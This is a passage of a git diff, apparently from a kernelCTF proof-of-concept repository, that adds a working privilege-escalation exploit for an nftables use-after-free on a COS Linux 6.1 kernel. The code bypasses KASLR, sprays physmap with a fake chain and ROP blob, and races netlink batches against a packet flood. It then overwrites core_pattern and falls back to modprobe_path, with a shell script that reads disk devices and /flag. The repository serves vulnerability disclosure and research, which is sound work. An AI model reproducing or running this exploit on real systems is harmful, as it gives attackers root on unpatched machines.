*/ + snprintf(tname, sizeof(tname), "s%03d", i); + h = nlbuf_begin_msg(&b, NFT_T(NFT_MSG_NEWTABLE), + NLM_F_REQUEST|NLM_F_ACK|NLM_F_CREATE|NLM_F_EXCL, + (*seq)++, pid, NFPROTO_IPV4, 0); + if (!h) break; + nl_strz(&b, h, NFTA_TABLE_NAME, tname); + nlbuf_put(&b, h, NFTA_TABLE_USERDATA, spray_udata, SPRAY_UDATA_LEN); + } + + batch_end(&b, (*seq)++, pid); + return (int)b.len; +} + +/* ========== CPU pinning ========== */ +static void pin_cpu(int cpu) { + cpu_set_t set; + CPU_ZERO(&set); + CPU_SET(cpu, &set); + sched_setaffinity(0, sizeof(set), &set); +} + +/* ========== race threads (writer+spray on CPU0, packet on CPU1) ========== */ +struct race_args { + int writer_fd; + uint32_t writer_pid; + pthread_barrier_t *bar; + uint64_t chain_kva; +}; + +static void *writer_thread(void *arg) { + struct race_args *a = arg; + pin_cpu(0); + pthread_barrier_wait(a->bar); + + uint8_t buf[262144]; + uint32_t seq = 10000; + uint64_t batches = 0; + + /* Build spray userdata: fake element with NFT_GOTO(physmap_chain) */ + uint8_t spray_udata[SPRAY_UDATA_LEN]; + build_spray_udata(spray_udata, a->chain_kva); + + printf("[*] writer: starting race with in-batch NEWTABLE spray (%d pairs/batch)\n", + SPRAY_BATCH_PAIRS); + + while (!g_stop) { + int len = build_race_batch(buf, sizeof(buf), &seq, a->writer_pid, + SPRAY_BATCH_PAIRS, spray_udata); + if (len > 0) nl_send(a->writer_fd, buf, len); + nl_drain(a->writer_fd); + batches++; + + if (batches % 10000 == 0) + printf("[*] writer: %lu batches\n", (unsigned long)batches); + } + + return NULL; +} + +static void *packet_thread(void *arg) { + struct race_args *a = arg; + (void)a; + pin_cpu(1); + pthread_barrier_wait(a->bar); + + int fd = socket(AF_INET, SOCK_DGRAM|SOCK_CLOEXEC, 0); + if (fd < 0) return NULL; + + struct sockaddr_in dst = { + .sin_family = AF_INET, + .sin_port = htons(31337), + .sin_addr.s_addr = htonl(INADDR_LOOPBACK) + }; + char pkt[1] = {'A'}; + + /* Connect so we can use send() which is faster than sendto() */ + connect(fd, 
(void *)&dst, sizeof(dst)); + + while (!g_stop) { + for (int i = 0; i < 2000 && !g_stop; i++) { + send(fd, pkt, 1, MSG_DONTWAIT); + } + } + close(fd); + return NULL; +} + +/* ========== core_pattern polling + SIGSEGV trigger ========== */ +static int check_core_pattern(void) { + int fd = open("/proc/sys/kernel/core_pattern", O_RDONLY); + if (fd < 0) return 0; + char buf[256]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n <= 0) return 0; + buf[n] = 0; + return strstr(buf, "/bin/dd") != NULL; +} + +static void trigger_core_dump(void) { + printf("[*] triggering core dump via SIGSEGV...\n"); + pid_t p = fork(); + if (p == 0) { + prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); + raise(SIGSEGV); + _exit(1); + } + if (p > 0) { + int status; + waitpid(p, &status, 0); + printf("[*] core dump child exited (sig=%d)\n", + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + } +} + +/* ========== modprobe_path fallback (for local QEMU testing) ========== */ +static void setup_payload(void) { + int fd = open("/tmp/pw", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + const char *s = + "#!/bin/sh\n" + "/bin/cat /dev/vdb > /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vda >> /tmp/flag 2>/dev/null\n" + "/bin/cat /flag >> /tmp/flag 2>/dev/null\n" + "/bin/cat /dev/vdb > /dev/ttyS0 2>/dev/null\n" + "/bin/cat /dev/vda >> /dev/ttyS0 2>/dev/null\n" + "/bin/chmod 777 /tmp/flag 2>/dev/null\n"; + write(fd, s, strlen(s)); close(fd); + + fd = open("/tmp/dummy", O_CREAT|O_WRONLY|O_TRUNC, 0755); + if (fd < 0) return; + write(fd, "\xff\xff\xff\xff", 4); close(fd); +} + +static int try_modprobe(void) { + pid_t p = fork(); + if (p == 0) { execl("/tmp/dummy", "/tmp/dummy", NULL); _exit(0); } + if (p > 0) waitpid(p, NULL, 0); + sleep_ms(500); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { buf[n]=0; printf("[+] FLAG:\n%s\n", buf); return 1; } + } + return 0; +} + +/* ========== 3D candidate 
generation ========== */ +static void add_cand(uint64_t kb, uint64_t pb, uint64_t kva_off) { + if (num_cands3d >= MAX_CANDS) return; + cands3d[num_cands3d++] = (struct cand3d){kb, pb, kva_off}; +} + +static void generate_candidates(void) { + /* + * __init_begin page reclaim strategy: + * After boot, 642 pages at kbase+OFF_INIT_BEGIN are freed to buddy allocator. + * mmap+MAP_POPULATE reclaims ~186 of them (642/total_pages * mmap_pages). + * These pages remain mapped at kbase+OFF_INIT_BEGIN+offset (kernel text mapping, + * CONFIG_DEBUG_PAGEALLOC=n so mapping persists). + * + * We fill ALL mmap'd pages with our fake chain. Pages that happen to be __init + * pages are visible at kbase-relative KVAs. We try offsets within the __init range. + * + * With 13 candidates (20s each), step through __init range (642 pages). + * Expected ~186 of our pages are __init → ~4 of 13 candidates will match. + */ + uint64_t kb = eb_kbases[0]; + int ncands = MAX_CANDS; + uint64_t step = (INIT_SIZE / ncands) & ~0xFFFULL; /* page-align */ + if (step < 0x1000) step = 0x1000; + + printf("[*] __init candidates: %d offsets (step=%#lx) in kbase+%#lx..+%#lx\n", + ncands, (unsigned long)step, + (unsigned long)OFF_INIT_BEGIN, (unsigned long)OFF_INIT_END); + + for (int i = 0; i < ncands && num_cands3d < MAX_CANDS; i++) { + uint64_t off = (uint64_t)i * step; + if (off + OFF_INIT_BEGIN >= OFF_INIT_END) + off = INIT_SIZE - 0x1000; /* clamp to last page */ + /* kva_off stores the offset from kbase (not from phbase) */ + add_cand(kb, 0, OFF_INIT_BEGIN + off); + } + + printf("[*] generated %d candidates (budget=%ds, cycle=%ds)\n", + num_cands3d, RACE_SECONDS, CYCLE_SECONDS); +} + +/* ========== exploit child (runs in namespace) ========== */ +static void on_alarm(int sig) { (void)sig; g_stop = 1; } + +static int exploit_child(int cycle_secs) { + setup_ns(); + + struct nlsock ns = nl_open(); + if (ns.fd < 0) die("netlink"); + int fl = fcntl(ns.fd, F_GETFL, 0); + fcntl(ns.fd, F_SETFL, fl & ~O_NONBLOCK); + 
+ int err = nft_setup_all(ns.fd, ns.pid); + if (err < 0) { + fprintf(stderr, "[-] nft setup: %d\n", err); + return 1; + } + printf("[+] nft objects ready\n"); + fcntl(ns.fd, F_SETFL, fl | O_NONBLOCK); + + /* Start race threads */ + g_stop = 0; + signal(SIGALRM, on_alarm); + signal(SIGTERM, on_alarm); + alarm(cycle_secs + 2); + + #define N_THREADS 2 + pthread_barrier_t bar; + pthread_barrier_init(&bar, NULL, N_THREADS); + + struct race_args ra = { + .writer_fd = ns.fd, .writer_pid = ns.pid, + .bar = &bar, .chain_kva = g_page_kva, + }; + + pthread_t threads[N_THREADS]; + pthread_create(&threads[0], NULL, writer_thread, &ra); + pthread_create(&threads[1], NULL, packet_thread, &ra); + + printf("[*] racing for %ds...\n", cycle_secs); + while (!g_stop) sleep_ms(100); + + g_stop = 1; + for (int i = 0; i < N_THREADS; i++) pthread_join(threads[i], NULL); + close(ns.fd); + return 0; +} + +/* ========== memory sizing ========== */ +static void auto_physmap_size(void) { + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + int avail = (int)(kb / 1024); + /* Use 40% of available RAM for physmap spray - aggressive but safe. 
+ * On 3.5GB kctf VM this gives ~1.4GB spray → ~40% physical coverage */ + int cap = avail * 2 / 5; + if (cap < 128) cap = 128; + if (cap > 2048) cap = 2048; + if (physmap_mb > cap) physmap_mb = cap; + printf("[*] RAM=%dMB, physmap capped to %dMB\n", avail, physmap_mb); + break; + } + } + fclose(f); +} + +/* ========== main exploit ========== */ +int main(void) { + setbuf(stdout, NULL); setbuf(stderr, NULL); + printf("=== COS-113 err_set_full UAF exploit ===\n"); + + auto_physmap_size(); + + /* Check for environment-provided addresses (nokaslr local testing) */ + uint64_t env_kb = env_u64("KBASE"), env_pb = env_u64("PHYSBASE"); + if (env_kb && env_pb) { + kbase = env_kb; phbase = env_pb; + eb_kbases[0] = kbase; eb_nkb = 1; + eb_phbases[0] = phbase; eb_npb = 1; + printf("[+] using env: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + do_entrybleed(); + if (!kbase || !phbase) { + fprintf(stderr, "[-] entrybleed failed completely\n"); + return 1; + } + } + printf("[+] primary kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + printf("[+] kbase candidates: %d, phbase candidates: %d\n", eb_nkb, eb_npb); + + setup_payload(); + physmap_spray(); + + /* Try to get exact KVA from pagemap (works on local QEMU, not on kctf). + * When available, use phbase-based KVA for the single candidate. + * On kctf, pagemap is restricted — fall through to __init candidates. 
*/ + uint64_t exact_kva = read_physmap_kva(); + if (exact_kva) { + printf("[+] exact KVA from pagemap: %#lx\n", (unsigned long)exact_kva); + /* Store as absolute KVA; main loop computes g_page_kva = kb + kva_off, + * so set kva_off = exact_kva - kbase (works because g_page_kva = kbase + kva_off) */ + cands3d[0] = (struct cand3d){kbase, 0, exact_kva - kbase}; + num_cands3d = 1; + } else { + generate_candidates(); + } + + struct timespec race_start; + clock_gettime(CLOCK_MONOTONIC, &race_start); + + int won = 0; + uint64_t prev_kb = 0, prev_pb = 0; + + for (int ci = 0; ci < num_cands3d && !won; ci++) { + /* Check total timeout */ + struct timespec now; + clock_gettime(CLOCK_MONOTONIC, &now); + long elapsed = now.tv_sec - race_start.tv_sec; + if (elapsed >= RACE_SECONDS) { + printf("[-] total timeout (%ds) reached at candidate %d/%d\n", + RACE_SECONDS, ci, num_cands3d); + break; + } + + /* Update globals for this candidate */ + kbase = cands3d[ci].kb; + /* For __init approach: kva_off is offset FROM kbase (not from phbase) */ + g_page_kva = kbase + cands3d[ci].kva_off; + + /* Print header when kbase changes */ + if (kbase != prev_kb) { + printf("\n[*] --- kbase=%#lx (init range %#lx-%#lx) ---\n", + (unsigned long)kbase, + (unsigned long)(kbase + OFF_INIT_BEGIN), + (unsigned long)(kbase + OFF_INIT_END)); + prev_kb = kbase; + } + printf("[*] cand %d/%d: kva=%#lx (init+%#lx) [%lds]\n", + ci+1, num_cands3d, (unsigned long)g_page_kva, + (unsigned long)(cands3d[ci].kva_off - OFF_INIT_BEGIN), elapsed); + + /* Refill physmap with ROP blob for current (kbase, kva) */ + physmap_fill_rop(); + + int cycle_secs = (num_cands3d == 1) ? 
RACE_SECONDS : CYCLE_SECONDS; + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) _exit(exploit_child(cycle_secs)); + + /* Parent: poll core_pattern while child races */ + for (int t = 0; t < cycle_secs * 2 && !won; t++) { + sleep_ms(500); + if (check_core_pattern()) { + printf("[+] GOT ROOT - core_pattern overwritten!\n"); + sleep_ms(500); + trigger_core_dump(); + printf("[*] waiting for core dump handler (dd -> ttyS0)...\n"); + sleep_ms(5000); + printf("[+] ROOT OUTPUT - flag should be on serial\n"); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { buf[n] = 0; printf("[+] FLAG:\n%s\n", buf); } + } + won = 1; + break; + } + int status; + if (waitpid(child, &status, WNOHANG) > 0) { + printf("[*] child exited early (status=%d sig=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1, + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + child = 0; + break; + } + } + + if (child > 0) { + kill(child, SIGTERM); + sleep_ms(500); + kill(child, SIGKILL); + waitpid(child, NULL, 0); + } + } + + /* Fallback: try modprobe_path (for local QEMU testing) */ + if (!won) { + printf("[*] trying modprobe_path fallback...\n"); + for (int i = 0; i < 5 && !won; i++) { + if (try_modprobe()) { won = 1; break; } + sleep_ms(1000); + } + } + + if (won) { printf("\n[+] SUCCESS\n"); return 0; } + printf("\n[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit_xdk.cpp b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit_xdk.cpp new file mode 100644 index 000000000..3873110a3 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/exploit_xdk.cpp @@ -0,0 +1,1716 @@ +/* + * LPE exploit for cos-113-18244.521.98 (Linux 6.1.155) + * kernelXDK-ported version + * + * Vulnerability: UAF in nft_add_set_elem() err_set_full path. 
+ * When a set with size=1 is full, element is inserted via
+ * hlist_add_head_rcu(), atomic_add_unless() fails, element
+ * removed via hlist_del_rcu() and freed via kfree() (NOT
+ * kfree_rcu). Concurrent RCU readers can access freed element.
+ *
+ * Exploitation:
+ * 1. Entrybleed KASLR bypass (kbase only, phbase not needed).
+ * 2. Physmap spray with fake nft_chain + ROP blob at __init_begin pages.
+ * 3. Create verdict map (hash, size=1, key_len=4) with fill element +
+ * base chain with immediate(KEY_RACE) + lookup rule.
+ * 4. Race: writer inserts elements (freed via err_set_full), in-batch
+ * NEWTABLE userdata spray reclaims kmalloc-cg-64 slot with fake
+ * element containing NFT_GOTO(physmap_chain).
+ * 5. Packet flood triggers lookup -> follows fake verdict ->
+ * nft_do_chain on fake chain -> ROP.
+ * 6. ROP: kernelXDK WRITE_WHAT_WHERE_64 actions rewrite core_pattern
+ * in-place, then kernelXDK MSLEEP stalls the thread.
+ * 7. Parent detects overwrite, triggers SIGSEGV -> core dump -> flag
+ * via serial.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <errno.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <signal.h>
+#include <unistd.h>
+#include <pthread.h>
+#include <time.h>
+#include <net/if.h>
+#include <arpa/inet.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <sys/prctl.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <linux/netlink.h>
+#include <linux/netfilter.h>
+#include <linux/netfilter/nfnetlink.h>
+#include <linux/netfilter/nf_tables.h>
+#include <memory>
+#include <vector>
+
+/* kernelXDK headers */
+#include
+#include
+
+/* Embed the KXDB target database into the binary */
+INCBIN(target_db, "target_db.kxdb");
+/* xdk INCBIN macro leaves the assembler section in .bss; restore .text. 
*/ +__asm__(".text\n"); + +/* ================================================================ + * Style-guide magic number constants + * ================================================================ */ +#define RACE_CPU 0 +#define FLOOD_CPU 1 +#define DROP_UID 1000 +#define DROP_GID 1000 +#define NL_BUFSZ (8 << 20) /* 8MB netlink socket buffer */ +#define NL_POLL_SLEEP_NS 500000 /* 0.5ms poll backoff */ +#define UDP_PORT 31337 +#define DREG_RET 130 /* nft_do_chain return address dreg */ +#define DREG_EXPR_LEN 16 /* bytes per dreg write */ +#define MSLEEP_FOREVER 0x7FFFFFFFULL +#define SET_DATA_TYPE_VERDICT 0xffffff00u +#define SET_ID_SPRAY 99 +#define RACE_SEQ_START 10000 +#define ALARM_GRACE_SEC 2 +#define WRITER_PROGRESS 2000 +#define KVM_PH_CORRECTION 0x100000000ULL /* 4GB */ +#define KB_COARSE_TIMING 16 +#define KB_FINE_TIMING 32 +#define PB_COARSE_TIMING 40 +#define CORE_DUMP_WAIT_MS 5000 +#define MODPROBE_WAIT_MS 500 +#define MODPROBE_RETRY_MS 1000 +#define POLL_INTERVAL_MS 500 +#define KILL_GRACE_MS 500 + +/* ================================================================ + * Protocol constants + * ================================================================ */ +#ifndef NFPROTO_UNSPEC +#define NFPROTO_UNSPEC 0 +#endif +#ifndef NFPROTO_INET +#define NFPROTO_INET 1 +#endif +#ifndef NFPROTO_IPV4 +#define NFPROTO_IPV4 2 +#endif +#ifndef NFPROTO_IPV6 +#define NFPROTO_IPV6 10 +#endif +#ifndef NF_INET_LOCAL_OUT +#define NF_INET_LOCAL_OUT 3 +#endif +#ifndef NF_IP_PRI_FILTER +#define NF_IP_PRI_FILTER 0 +#endif +#ifndef NFTA_TABLE_USERDATA +#define NFTA_TABLE_USERDATA 6 +#endif + +/* ================================================================ + * Kernel symbol offsets -- resolved at runtime from kernelXDK + * + * Fallback values are for cos-113-18244.521.98 vmlinux if the + * KXDB database does not contain the target or symbol. 
+ * ================================================================ */
+/* 0x02bb9ec0: core_pattern (kernel global for core dump handler path) */
+static uint64_t off_core_pattern = 0x2bb9ec0;
+/* 0x01d43120: nft_immediate_ops (nft expression ops struct for immediate) */
+static uint64_t off_nft_imm_ops = 0x1d43120;
+
+static uint64_t off_init_begin = 0x345c000;
+static uint64_t off_init_end = 0x36de000;
+static std::unique_ptr<Target> g_xdk_target;
+
+/* ================================================================
+ * nft_chain layout -- for the fake chain on physmap pages
+ *
+ * struct nft_chain (120 bytes):
+ * +0: blob_gen_0 (ptr)
+ * +8: blob_gen_1 (ptr)
+ * +64: table (ptr)
+ * +72: handle (u64)
+ * +80: use (u32)
+ * +84: flags (u8)
+ * +88: name (ptr)
+ * ================================================================ */
+#define NFT_CHAIN_OFFS_BLOB0 0
+#define NFT_CHAIN_OFFS_BLOB1 8
+#define NFT_CHAIN_OFFS_TABLE 64
+#define NFT_CHAIN_OFFS_HANDLE 72
+#define NFT_CHAIN_OFFS_USE 80
+#define NFT_CHAIN_OFFS_FLAGS 84
+#define NFT_CHAIN_OFFS_NAME 88
+
+/* nft_hash_elem spray overlay offsets */
+#define NFT_HASH_ELEM_OFFS_GENMASK 16
+#define NFT_HASH_ELEM_OFFS_KEY_OFF 17
+#define NFT_HASH_ELEM_OFFS_DATA_OFF 19
+#define NFT_HASH_ELEM_OFFS_KEY 32
+#define NFT_HASH_ELEM_OFFS_VERDICT 36
+#define NFT_HASH_ELEM_OFFS_CHAIN 44
+
+/* page layout for physmap ROP blob */
+#define BLOB_OFFSET 0x80
+#define NAME_OFFSET 0x300
+
+/* ================================================================
+ * Register custom target data for symbols/structs not in the
+ * standard KXDB database
+ * ================================================================ */
+static void register_custom_targets(TargetDb &kxdb) {
+ Target ct("kernelctf", "cos-113-18244.521.98");
+
+ /* Symbols specific to cos-113-18244.521.98 vmlinux */
+ ct.AddSymbol("core_pattern", 0x2bb9ec0);
+ ct.AddSymbol("nft_immediate_ops", 0x1d43120);
+ ct.AddSymbol("__init_begin", 0x345c000);
+ ct.AddSymbol("__init_end", 
0x36de000);
+
+ /* nft_chain layout */
+ ct.AddStruct("nft_chain", 120, {
+ {"blob_gen_0", 0, 8},
+ {"blob_gen_1", 8, 8},
+ {"table", 64, 8},
+ {"handle", 72, 8},
+ {"use", 80, 4},
+ {"flags", 84, 1},
+ {"name", 88, 8},
+ });
+
+ kxdb.AddTarget(ct);
+}
+
+/*
+ * Resolve all offsets from the kernelXDK target database.
+ * Falls back to hardcoded cos-113 values if a symbol is missing.
+ * Post-RIP execution still requires kernelXDK ROP actions.
+ */
+
+static uint64_t try_get_symbol(Target &target, const char *name,
+ uint64_t fallback) {
+ try {
+ uint64_t off = target.GetSymbolOffset(name);
+ if (off != 0) return off;
+ } catch (...) {}
+ printf("[*] xdk: symbol '%s' not in KXDB, using fallback %#lx\n",
+ name, (unsigned long)fallback);
+ return fallback;
+}
+
+// @step(name="kernelXDK Offset Resolution")
+static void xdk_init_offsets(void) {
+ try {
+ TargetDb kxdb("target_db.kxdb", target_db);
+ register_custom_targets(kxdb);
+
+ auto target = kxdb.AutoDetectTarget();
+ printf("[+] xdk: detected target: %s %s\n",
+ target.GetDistro().c_str(),
+ target.GetReleaseName().c_str());
+
+ /* Resolve symbol offsets */
+ off_core_pattern = try_get_symbol(target, "core_pattern", off_core_pattern);
+ off_nft_imm_ops = try_get_symbol(target, "nft_immediate_ops", off_nft_imm_ops);
+ off_init_begin = try_get_symbol(target, "__init_begin", off_init_begin);
+ off_init_end = try_get_symbol(target, "__init_end", off_init_end);
+ g_xdk_target = std::make_unique<Target>(target);
+
+ /* Refuse to silently fall back to manual gadgets for post-RIP work. */
+ g_xdk_target->GetRopActionItems(RopActionId::WRITE_WHAT_WHERE_64);
+ g_xdk_target->GetRopActionItems(RopActionId::MSLEEP);
+
+ printf("[+] xdk: symbols and post-RIP actions resolved\n");
+ } catch (std::exception &e) {
+ printf("[!] 
xdk init failed: %s -- symbol fallbacks may still work, " + "but kernelXDK post-RIP actions are unavailable\n", e.what()); + g_xdk_target.reset(); + } +} + +/* ================================================================ + * Exploit constants + * ================================================================ */ + +/* spray: in-batch NEWTABLE userdata for kmalloc-cg-64 reclamation */ +#define SPRAY_UDATA_LEN 52 +#define SPRAY_BATCH_PAIRS 256 + +#define PHYSMAP_MB 1024 + +#define KEY_FILL 0x00000000u +#define KEY_RACE 0x00000001u +#define NFT_GOTO_CODE ((uint32_t)(-4)) + +#define RACE_SECONDS 260 +#define CYCLE_SECONDS 10 +#define MAX_CANDS 26 +#define VULN_TRIGGER_SECS 30 +#define MAX_EB_CANDS 5 + +/* ========== globals ========== */ +static volatile sig_atomic_t g_stop; +static uint64_t kbase, phbase; +static void *phys_region; +static int physmap_mb = PHYSMAP_MB; +static uint64_t g_page_kva; + +/* Candidate search: (kbase, init_page_offset) pairs */ +struct cand3d { + uint64_t kbase, phbase, kva_off; +}; +static struct cand3d cands3d[MAX_CANDS]; +static int num_cands3d; + +/* EntryBleed multi-candidate output */ +static uint64_t eb_kbases[MAX_EB_CANDS]; +static int eb_nkb; +static uint64_t eb_phbases[MAX_EB_CANDS]; +static int eb_npb; + +/* ========== helpers ========== */ +static void die(const char *msg) { + perror(msg); + _exit(1); +} + +static void sleep_ms(int ms) { + struct timespec ts = {ms/1000, (ms%1000)*1000000L}; + // @sleep(desc="generic millisecond sleep helper") + nanosleep(&ts, nullptr); +} + +static uint64_t env_u64(const char *name) { + const char *val = getenv(name); + return val ? strtoull(val, nullptr, 0) : 0; +} + +/* + * Parse a u64 from CLI input. + * Accepts: + * - decimal (e.g. 1234) + * - 0x-prefixed hex (e.g. 0xffffffff81000000) + * - raw hex without prefix (e.g. 
ffffffff81000000 from /proc/kallsyms) + */ +static bool parse_u64_arg(const char *s, uint64_t *out) { + if (!s || !*s || !out) return false; + errno = 0; + char *end = nullptr; + unsigned long long v = strtoull(s, &end, 0); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast(v); + return true; + } + + errno = 0; + end = nullptr; + v = strtoull(s, &end, 16); + if (errno == 0 && end != s && *end == '\0') { + *out = static_cast(v); + return true; + } + return false; +} + +/* + * Best-effort integrated KASLR base leak from /proc/kallsyms. + * Returns 0 when restricted/unavailable. + */ +static uint64_t leak_kbase_proc_kallsyms(void) { + FILE *f = fopen("/proc/kallsyms", "r"); + if (!f) return 0; + + char line[512]; + uint64_t kb = 0; + while (fgets(line, sizeof(line), f)) { + char addr_s[64] = {}; + char type = '\0'; + char sym[256] = {}; + if (sscanf(line, "%63s %c %255s", addr_s, &type, sym) != 3) continue; + uint64_t v = 0; + if (!parse_u64_arg(addr_s, &v)) continue; + if (!v) continue; /* kptr_restrict usually yields all-zero addresses */ + if (v < 0xffffffff80000000ULL || v > 0xfffffffff0000000ULL) continue; + kb = v & ~0x1fffffULL; /* normalize to 2MB-aligned kernel base */ + break; + } + fclose(f); + return kb; +} + +static bool kernel_cmdline_has_token(const char *tok) { + if (!tok || !*tok) return false; + FILE *f = fopen("/proc/cmdline", "r"); + if (!f) return false; + char line[4096]; + bool found = false; + if (fgets(line, sizeof(line), f)) { + found = strstr(line, tok) != nullptr; + } + fclose(f); + return found; +} + +/* ========== netlink buffer helpers ========== */ +struct nlbuf { + uint8_t *buf; + size_t len, cap; +}; + +static void nlbuf_init(struct nlbuf *nb, void *buf, size_t cap) { + nb->buf = static_cast(buf); + nb->len = 0; + nb->cap = cap; +} + +static struct nlmsghdr *nlbuf_begin_msg(struct nlbuf *nb, uint16_t type, + uint16_t flags, uint32_t seq, uint32_t pid, uint8_t fam, uint16_t res) +{ + size_t off = NLMSG_ALIGN(nb->len); 
+ size_t need = off + NLMSG_SPACE(sizeof(struct nfgenmsg));
+ if (need > nb->cap) return nullptr;
+ struct nlmsghdr *nlh = reinterpret_cast<struct nlmsghdr *>(nb->buf + off);
+ memset(nlh, 0, NLMSG_SPACE(sizeof(struct nfgenmsg)));
+ nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg));
+ nlh->nlmsg_type = type;
+ nlh->nlmsg_flags = flags;
+ nlh->nlmsg_seq = seq;
+ nlh->nlmsg_pid = pid;
+ struct nfgenmsg *g = static_cast<struct nfgenmsg *>(NLMSG_DATA(nlh));
+ g->nfgen_family = fam;
+ g->version = NFNETLINK_V0;
+ g->res_id = htons(res);
+ nb->len = off + NLMSG_ALIGN(nlh->nlmsg_len);
+ return nlh;
+}
+
+static int nlbuf_put(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type,
+ const void *data, uint16_t data_len)
+{
+ size_t mo = static_cast<size_t>(reinterpret_cast<uint8_t *>(nlh) - nb->buf);
+ size_t me = mo + NLMSG_ALIGN(nlh->nlmsg_len);
+ if (me != nb->len) return -1;
+ size_t nl = NLA_HDRLEN + data_len, np = NLA_ALIGN(nl);
+ if (me + np > nb->cap) return -1;
+ struct nlattr *a = reinterpret_cast<struct nlattr *>(nb->buf + me);
+ a->nla_type = type;
+ a->nla_len = static_cast<__u16>(nl);
+ if (data_len) memcpy(reinterpret_cast<uint8_t *>(a) + NLA_HDRLEN, data, data_len);
+ if (np > nl) memset(reinterpret_cast<uint8_t *>(a) + nl, 0, np - nl);
+ nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + static_cast<__u32>(np);
+ nb->len = mo + NLMSG_ALIGN(nlh->nlmsg_len);
+ return 0;
+}
+
+static struct nlattr *nlbuf_nest_start(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type) {
+ size_t mo = static_cast<size_t>(reinterpret_cast<uint8_t *>(nlh) - nb->buf);
+ size_t me = mo + NLMSG_ALIGN(nlh->nlmsg_len);
+ if (me != nb->len) return nullptr;
+ size_t np = NLA_ALIGN(NLA_HDRLEN);
+ if (me + np > nb->cap) return nullptr;
+ struct nlattr *a = reinterpret_cast<struct nlattr *>(nb->buf + me);
+ a->nla_type = type | NLA_F_NESTED;
+ a->nla_len = NLA_HDRLEN;
+ if (np > NLA_HDRLEN) memset(reinterpret_cast<uint8_t *>(a) + NLA_HDRLEN, 0, np - NLA_HDRLEN);
+ nlh->nlmsg_len = NLMSG_ALIGN(nlh->nlmsg_len) + static_cast<__u32>(np);
+ nb->len = mo + NLMSG_ALIGN(nlh->nlmsg_len);
+ return a;
+}
+
+static void 
nlbuf_nest_end(struct nlbuf *nb, struct nlattr *n) {
+ n->nla_len = static_cast<__u16>(nb->buf + nb->len - reinterpret_cast<uint8_t *>(n));
+}
+
+static int nl_u32be(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type, uint32_t val) {
+ val = htonl(val);
+ return nlbuf_put(nb, nlh, type, &val, 4);
+}
+
+static int nl_strz(struct nlbuf *nb, struct nlmsghdr *nlh, uint16_t type, const char *str) {
+ return nlbuf_put(nb, nlh, type, str, static_cast<uint16_t>(strlen(str) + 1));
+}
+
+/* ========== netlink socket ========== */
+struct nlsock {
+ int fd;
+ uint32_t pid;
+};
+
+static struct nlsock nl_open(void) {
+ struct nlsock s = {-1, 0};
+ int fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER);
+ if (fd < 0) return s;
+ struct sockaddr_nl sa = {};
+ sa.nl_family = AF_NETLINK;
+ if (bind(fd, reinterpret_cast<struct sockaddr *>(&sa), sizeof(sa)) < 0) {
+ close(fd);
+ return s;
+ }
+ socklen_t sl = sizeof(sa);
+ getsockname(fd, reinterpret_cast<struct sockaddr *>(&sa), &sl);
+ s.pid = sa.nl_pid;
+ s.fd = fd;
+ int bufsz = NL_BUFSZ;
+ setsockopt(fd, SOL_SOCKET, SO_RCVBUF, &bufsz, sizeof(bufsz));
+ setsockopt(fd, SOL_SOCKET, SO_SNDBUF, &bufsz, sizeof(bufsz));
+ int fl = fcntl(fd, F_GETFL, 0);
+ if (fl >= 0) fcntl(fd, F_SETFL, fl | O_NONBLOCK);
+ return s;
+}
+
+static int nl_send(int fd, const void *buf, size_t len) {
+ struct sockaddr_nl sa = {};
+ sa.nl_family = AF_NETLINK;
+ struct iovec iov = {const_cast<void *>(buf), len};
+ struct msghdr msg = {};
+ msg.msg_name = &sa;
+ msg.msg_namelen = sizeof(sa);
+ msg.msg_iov = &iov;
+ msg.msg_iovlen = 1;
+ return sendmsg(fd, &msg, 0) < 0 ? 
